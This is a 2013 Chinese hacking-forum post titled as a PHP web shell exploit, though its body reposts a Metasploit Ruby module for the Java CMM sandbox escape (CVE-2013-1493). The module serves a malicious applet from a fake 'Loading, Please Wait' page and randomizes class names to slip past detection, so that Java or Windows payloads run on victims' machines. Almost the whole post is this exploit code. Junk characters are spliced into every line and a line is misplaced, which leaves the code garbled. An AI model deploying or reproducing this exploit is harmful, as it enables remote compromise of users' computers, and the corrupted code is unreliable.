找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2305|回复: 0
打印 上一主题 下一主题

STUNSHELL PHP Web Shell远程执行代码

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:31:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
##
3 w4 A7 w8 h1 |2 L) R, o) f$ O6 s' C) r: \5 @6 b2 k
# This file is part of the Metasploit Framework and may be subject to: z( J1 X3 w! G# V3 z9 W: E
# redistribution and commercial restrictions. Please see the Metasploit, v2 M- e2 y/ v3 @. l
# web site for more information on licensing and terms of use.
( k8 h% Q2 B4 I. B2 k; y" T# http://metasploit.com/% P# e! J( N* }5 s) s
##
, ]7 e* \) W8 c9 d% l3 e1 Prequire ‘msf/core’+ `' K& [+ o0 m% [2 M" z
require ‘rex’
& t- k. n8 d' r' @% v, qclass Metasploit3 < Msf::Exploit::Remote
. F/ N' W6 |% i. x1 F! d3 N9 p3 F. F5 xRank = NormalRanking/ D' a9 P7 C* w4 M* q3 a
include Msf::Exploit::Remote::HttpServer::HTML
! t, Y) Z+ f+ ^& d' _* S0 d0 Kinclude Msf::Exploit::EXE
2 [* r7 w3 K3 R  b4 Ainclude Msf::Exploit::Remote::BrowserAutopwn) Y$ w% ~4 h& E2 o9 r7 v6 w
autopwn_info({ :javascript => false })
3 w3 y2 K8 }5 {1 r6 k/ q) @def initialize( info = {} )
: F! ~$ F- c# }: m0 k5 X: B! ?9 ]' csuper( update_info( info,) S# ?: d% |! m3 Z$ m
‘Name’ => ‘Java CMM Remote Code Execution’,) v: L3 m4 ]$ _* q$ p5 X* d
‘Description’ => %q{
  X: p" i( I, k" ~" h. rThis module abuses the Color Management classes from a Java Applet to run/ z! A$ I; i! c
arbitrary Java code outside of the sandbox as exploited in the wild in February
3 w9 q5 C, N! A8 _2 {: g  Sand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41. C) b) l1 Z. J3 A* ?: @/ b
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
" R( U( W/ A( W# Qsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
7 x# L" `* Z) z( ^2 O" pwarning in order to run the malicious applet." _# N3 S$ G- o& R0 a( w
},
( ~6 n$ w3 x6 `' ~. j) i; U6 S‘License’ => MSF_LICENSE,6 v+ c  x4 z7 q% [
‘Author’ =>! E! @3 \3 O4 @, l& R; a0 h
'Unknown', # Vulnerability discovery and Exploit2 }1 ]1 h! W) E3 g8 u& q# ~8 ^
'juan vazquez' # Metasploit module (just ported the published exploit)
$ D' V2 w" d& K' m& y1 V, U],% y" n& e  x1 I- e* ]+ N& ~* b
‘References’ =>
0 S$ x6 a6 z6 ^2 e[8 `! x+ Y3 C' K0 @0 g' V
[ 'CVE', '2013-1493' ],
& ]; ]/ p6 ]: K2 p# C1 F+ E% J8 b! D[ 'OSVDB', '90737' ],
' B8 [( V& S* P$ S4 k[ 'BID', '58238' ],+ W! k1 N/ G( T& i( l
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],% |# {  F5 U- N3 I" x2 q4 W
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],* y( e2 H% Y1 P/ Z6 L
[ 'URL', 'http://pastie.org/pastes/6581034' ]
6 X$ d# v: Q* W+ q7 Y],
/ P% F0 `% ~# h% p‘Platform’ => [ 'win', 'java' ],
/ q. i, @; V  p( C‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
; n' \* Y& }& |* I‘Targets’ =>
& s. W" _/ |0 I[) ?+ N& D  }) M+ c2 e, j
[ 'Generic (Java Payload)',
1 n" P, a' E# g. |, J{
0 _& `! w5 S/ s4 M3 m'Platform' => 'java',& t: ^2 K/ V/ \- F$ f/ L& s
'Arch' => ARCH_JAVA
/ T. ], M0 h% C/ I}8 I" d! d+ ~+ |* C7 J) b! O
],
# z4 H0 ^  |# ?7 o' k) R( I: j[ 'Windows x86 (Native Payload)',
4 T0 A3 T) o0 w. X{
0 c3 v; y- G1 N'Platform' => 'win',
6 X) s( _8 f9 I' d  o, X* M'Arch' => ARCH_X86
& U- M% u6 e' a6 P4 g  j}
" k) j" ]7 b( Q]
) x  |3 K$ @8 d" ?7 h8 ?, D],2 U  a6 u2 f6 Y% g# A+ j
‘‘DisclosureDate’ => ‘Mar 01 2013′
" a: G+ G- i0 m))
0 ]' V% L9 _* e8 `7 w& E8 @- [( h3 S8 |end
  D- J- g, p& M6 Xdef setup
) B4 {  k  v5 S& Rpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”); L( {. C, q* A. r% g$ r0 ]
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }6 L' @$ F( L$ ^# F$ V
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
4 y! [7 f; J  U5 b; q" L+ S  p8 |@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
, `# H5 s: e3 m3 r# L$ G: y2 Bpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)5 U! P0 e5 Q* |9 g  J1 i: c
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
8 c8 t' X7 I: l) v; K9 v* ?8 H2 jpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
" a' q0 |5 j3 T# U; ~" N# B@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
# A8 e$ G, N/ G6 x@init_class_name = rand_text_alpha(“Init”.length); G$ K$ d4 K+ s2 t
@init_class.gsub!(“Init”, @init_class_name)
9 I- p. Y! @: G$ @/ Asuper
& a$ q* j5 Y1 E  [# g5 K) rend
6 O, [9 e; h* E8 ?def on_request_uri(cli, request)
$ V! K$ |/ `# j3 z- yprint_status(“handling request for #{request.uri}”)
& _. C$ Z( u( ^( J+ J% G0 ~case request.uri
1 z1 J5 Q* q: l. c: s0 u: gwhen /\.jar$/i5 D( S0 T% F& m. R1 }3 X
jar = payload.encoded_jar
/ U2 L- j; o# X0 _jar.add_file(“#{@init_class_name}.class”, @init_class)! a9 E" {# A, p
jar.add_file(“Leak.class”, @leak_class)
) I+ X! Z* N5 e* Yjar.add_file(“MyBufferedImage.class”, @buffered_image_class)* W; P: i; o  a: H9 \
jar.add_file(“MyColorSpace.class”, @color_space_class), z! K( P* j1 L6 \( |. q9 b
DefaultTarget’ => 1,& O6 m! g5 N1 ]7 r; x' T
metasploit_str = rand_text_alpha(“metasploit”.length)( I2 ^; k" N, G, X8 p; `% T
payload_str = rand_text_alpha(“payload”.length)
7 G& _* |6 R. M& K. m! r3 l$ L2 u. \jar.entries.each { |entry|
; ]: P2 R' L6 zentry.name.gsub!(“metasploit”, metasploit_str)
' {& Q6 e$ w! a1 C7 Pentry.name.gsub!(“Payload”, payload_str)% Z# J  [& d9 I' e
entry.data = entry.data.gsub(“metasploit”, metasploit_str)- V! E. ^, J- z) E
entry.data = entry.data.gsub(“Payload”, payload_str)
& @, u2 E6 T- X# a}
5 n$ V; x# W3 Fjar.build_manifest* s" O' D) j' H2 _- n7 H
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })$ w% N2 w) @0 }8 ^
when /\/$// m% L6 m5 C' G" L1 F8 k' R5 x2 l
payload = regenerate_payload(cli)
. I3 Q5 S# D2 U8 d8 aif not payload
4 h$ {+ P+ v5 j) Wprint_error(“Failed to generate the payload.”); {7 }9 t. h, s+ U
send_not_found(cli)6 L8 f9 R6 E! J- [3 {( `
return
  F# s7 f# {. M: w: z0 @# o9 `end
* `) d7 g; O8 J7 Fsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
4 e/ V& w9 i' c! m4 p; xelse
8 N( g7 K5 o3 F' h1 r) [8 \send_redirect(cli, get_resource() + ‘/’, ”)/ S( y5 `6 M! K0 h2 T
end
. Z6 |! v" x8 }8 |" l. T4 aend
& C0 V. N* Z7 U; Q3 Wdef generate_html# @& F! O6 |+ `8 M6 [* I
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
  A2 N/ u! Z3 X6 v9 ~html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
1 n! a& I7 a8 f" w0 phtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|* t9 S9 y) f6 W' B4 G) w3 z
html += %Q|</applet></body></html>|# ~+ Y7 q9 K2 _/ C
return html' a% P8 }3 l$ G/ B; s3 |' k
end
0 x$ p* y$ i/ r# i7 ]% y: Q- `end" j6 G0 m0 M! \( z: {6 i6 x
end
' ^! ^2 y' \! p$ b7 ^8 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表